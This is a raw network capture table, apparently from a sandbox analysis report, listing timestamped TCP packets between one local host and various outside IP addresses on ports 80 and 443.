Nov 25, 2021 12:57:48.953178883 CET	49823	80	192.168.11.20	172.67.164.153
Nov 25, 2021 12:57:53.957892895 CET	49824	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:57:53.969721079 CET	80	49824	3.64.163.50	192.168.11.20
Nov 25, 2021 12:57:53.969901085 CET	49824	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:57:53.969954967 CET	49824	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:57:53.981332064 CET	80	49824	3.64.163.50	192.168.11.20
Nov 25, 2021 12:57:53.981384993 CET	80	49824	3.64.163.50	192.168.11.20
Nov 25, 2021 12:57:53.981420994 CET	80	49824	3.64.163.50	192.168.11.20
Nov 25, 2021 12:57:53.981712103 CET	49824	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:57:53.981765032 CET	49824	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:57:53.993021965 CET	80	49824	3.64.163.50	192.168.11.20
Nov 25, 2021 12:58:04.224369049 CET	49825	80	192.168.11.20	136.143.191.204
Nov 25, 2021 12:58:04.395541906 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:04.395772934 CET	49825	80	192.168.11.20	136.143.191.204
Nov 25, 2021 12:58:04.395824909 CET	49825	80	192.168.11.20	136.143.191.204
Nov 25, 2021 12:58:04.573025942 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:04.573091030 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:04.573141098 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:04.573188066 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:04.573224068 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:04.573457003 CET	49825	80	192.168.11.20	136.143.191.204
Nov 25, 2021 12:58:04.573668957 CET	49825	80	192.168.11.20	136.143.191.204
Nov 25, 2021 12:58:04.573966980 CET	49825	80	192.168.11.20	136.143.191.204
Nov 25, 2021 12:58:04.744530916 CET	80	49825	136.143.191.204	192.168.11.20
Nov 25, 2021 12:58:24.825898886 CET	49826	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:58:24.837698936 CET	80	49826	3.64.163.50	192.168.11.20
Nov 25, 2021 12:58:24.837869883 CET	49826	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:58:24.837934971 CET	49826	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:58:24.849312067 CET	80	49826	3.64.163.50	192.168.11.20
Nov 25, 2021 12:58:24.849364996 CET	80	49826	3.64.163.50	192.168.11.20
Nov 25, 2021 12:58:24.849401951 CET	80	49826	3.64.163.50	192.168.11.20
Nov 25, 2021 12:58:24.849699974 CET	49826	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:58:24.849778891 CET	49826	80	192.168.11.20	3.64.163.50
Nov 25, 2021 12:58:24.861171961 CET	80	49826	3.64.163.50	192.168.11.20
Nov 25, 2021 12:58:40.649848938 CET	49827	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:58:40.925158978 CET	80	49827	203.170.80.250	192.168.11.20
Nov 25, 2021 12:58:40.925379038 CET	49827	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:58:40.925452948 CET	49827	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:58:41.202750921 CET	80	49827	203.170.80.250	192.168.11.20
Nov 25, 2021 12:58:41.202814102 CET	80	49827	203.170.80.250	192.168.11.20
Nov 25, 2021 12:58:41.203097105 CET	49827	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:58:41.203178883 CET	49827	80	192.168.11.20	203.170.80.250
Nov 25, 2021 12:58:41.478652954 CET	80	49827	203.170.80.250	192.168.11.20
Nov 25, 2021 12:59:21.082148075 CET	49828	80	192.168.11.20	192.0.78.25
Nov 25, 2021 12:59:21.090945005 CET	80	49828	192.0.78.25	192.168.11.20
Nov 25, 2021 12:59:21.091240883 CET	49828	80	192.168.11.20	192.0.78.25
Nov 25, 2021 12:59:21.091321945 CET	49828	80	192.168.11.20	192.0.78.25
Nov 25, 2021 12:59:21.100228071 CET	80	49828	192.0.78.25	192.168.11.20
Nov 25, 2021 12:59:21.100280046 CET	80	49828	192.0.78.25	192.168.11.20
Nov 25, 2021 12:59:21.100316048 CET	80	49828	192.0.78.25	192.168.11.20
Nov 25, 2021 12:59:21.100600958 CET	49828	80	192.168.11.20	192.0.78.25
Nov 25, 2021 12:59:21.100662947 CET	49828	80	192.168.11.20	192.0.78.25
Nov 25, 2021 12:59:21.109532118 CET	80	49828	192.0.78.25	192.168.11.20
Nov 25, 2021 12:59:26.440660954 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.542753935 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.542958975 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.543008089 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.644032955 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648669958 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648755074 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648819923 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648866892 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648927927 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648988008 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.648997068 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.649049997 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.649060965 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.649115086 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.649175882 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.649194002 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.649240971 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.649274111 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.649333000 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.649451971 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.649501085 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.750144958 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750267982 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750318050 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750368118 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750380039 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.750415087 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750428915 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.750463963 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750510931 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750539064 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.750560045 CET	80	49829	198.185.159.144	192.168.11.20
Nov 25, 2021 12:59:26.750577927 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.750694036 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:26.750731945 CET	49829	80	192.168.11.20	198.185.159.144
Nov 25, 2021 12:59:31.681031942 CET	49830	80	192.168.11.20	66.29.140.185
Nov 25, 2021 12:59:31.834472895 CET	80	49830	66.29.140.185	192.168.11.20
Nov 25, 2021 12:59:31.834758997 CET	49830	80	192.168.11.20	66.29.140.185
Nov 25, 2021 12:59:31.834853888 CET	49830	80	192.168.11.20	66.29.140.185
Nov 25, 2021 12:59:31.987791061 CET	80	49830	66.29.140.185	192.168.11.20
Nov 25, 2021 12:59:32.055282116 CET	80	49830	66.29.140.185	192.168.11.20
Nov 25, 2021 12:59:32.055335999 CET	80	49830	66.29.140.185	192.168.11.20
Nov 25, 2021 12:59:32.055500984 CET	49830	80	192.168.11.20	66.29.140.185
Nov 25, 2021 12:59:33.841420889 CET	49830	80	192.168.11.20	66.29.140.185
Nov 25, 2021 12:59:33.994374037 CET	80	49830	66.29.140.185	192.168.11.20
Nov 25, 2021 13:00:06.736754894 CET	49832	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:07.739619017 CET	49832	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:09.754771948 CET	49832	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:13.769447088 CET	49832	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:21.783281088 CET	49832	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:27.801012039 CET	49833	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:28.813062906 CET	49833	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:30.487730980 CET	49834	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:30.828107119 CET	49833	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:31.499881983 CET	49834	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:33.514975071 CET	49834	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:34.842761040 CET	49833	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:37.529650927 CET	49834	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:42.856563091 CET	49833	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:45.543668985 CET	49834	80	192.168.11.20	116.62.216.226
Nov 25, 2021 13:00:58.931627035 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.943512917 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.943850994 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.945292950 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.945389986 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.945430994 CET	49836	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.956779957 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.956846952 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.956881046 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.956912994 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.956954002 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.956969976 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957003117 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957125902 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.957154989 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957212925 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957247019 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957278013 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957299948 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.957483053 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.957732916 CET	80	49836	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.957855940 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.958010912 CET	49836	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.958096027 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.958116055 CET	49836	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.968586922 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.968653917 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.968687057 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.968760967 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.968806982 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.968883991 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.968949080 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.968992949 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969140053 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.969160080 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.969224930 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969422102 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.969480038 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969547987 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969582081 CET	80	49835	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969643116 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.969707012 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.969724894 CET	49835	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.969820023 CET	80	49836	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969938040 CET	80	49836	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.969966888 CET	80	49836	3.64.163.50	192.168.11.20
Nov 25, 2021 13:00:58.970156908 CET	49836	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.970207930 CET	49836	80	192.168.11.20	3.64.163.50
Nov 25, 2021 13:00:58.981561899 CET	80	49836	3.64.163.50	192.168.11.20
Nov 25, 2021 13:01:12.001957893 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.002039909 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.002211094 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.035404921 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.035427094 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.260420084 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.260648012 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.268867970 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.268888950 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.269191027 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.269377947 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.271553993 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.311882973 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.480285883 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.480362892 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.480473995 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.480528116 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.480540991 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.480551958 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.480560064 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.480566978 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.480581999 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.480679989 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590058088 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.590265989 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590271950 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590313911 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590317965 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590368986 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590375900 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.590424061 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590431929 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.590564966 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.590641975 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590647936 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590689898 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590738058 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590743065 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.590836048 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.590884924 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.591001034 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.678180933 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.678353071 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.678359032 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.678411007 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.678416967 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.678419113 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.678428888 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700125933 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.700248003 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.700310946 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700356960 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700404882 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700409889 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700503111 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700510979 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.700547934 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.700552940 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700557947 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700685978 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700691938 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.700738907 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700788021 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700836897 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700839043 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.700934887 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.742508888 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.742683887 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.742769003 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.788275957 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.788475990 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.788507938 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.788516998 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.788527012 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810053110 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.810203075 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810235977 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810249090 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810259104 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810283899 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810467958 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.810642004 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810668945 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.810702085 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811297894 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.811436892 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811475992 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.811481953 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811618090 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811651945 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.811707020 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811736107 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.811779022 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811814070 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.811870098 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811892033 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.811966896 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812087059 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812189102 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.812408924 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812468052 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812489033 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812514067 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812524080 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.812561035 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.812594891 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.812733889 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.853171110 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.853322983 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.853411913 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.853455067 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.853492022 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.853589058 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.853625059 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.898735046 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.898964882 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.898996115 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.922796965 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.922986031 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.922997952 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.923080921 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.923163891 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.923192024 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.923221111 CET	443	49837	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:12.923227072 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:12.923401117 CET	49837	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:15.630872011 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:15.911901951 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:15.912231922 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:15.913723946 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:15.913800955 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:15.913960934 CET	49839	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.188790083 CET	80	49839	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.189142942 CET	49839	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.189246893 CET	49839	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.195628881 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195693970 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195735931 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195777893 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195851088 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.195884943 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195935965 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195977926 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.195983887 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.196019888 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.196060896 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.196101904 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.196217060 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.196336985 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.462950945 CET	80	49839	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.463659048 CET	80	49839	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.464023113 CET	49839	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.464124918 CET	49839	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.475204945 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.475269079 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.475429058 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.475545883 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.483566046 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483633041 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483676910 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483719110 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483760118 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483793020 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.483800888 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483918905 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.483922005 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.483966112 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484009027 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484050035 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484088898 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484131098 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484146118 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.484170914 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484214067 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484256029 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484277010 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.484296083 CET	80	49838	203.170.80.250	192.168.11.20
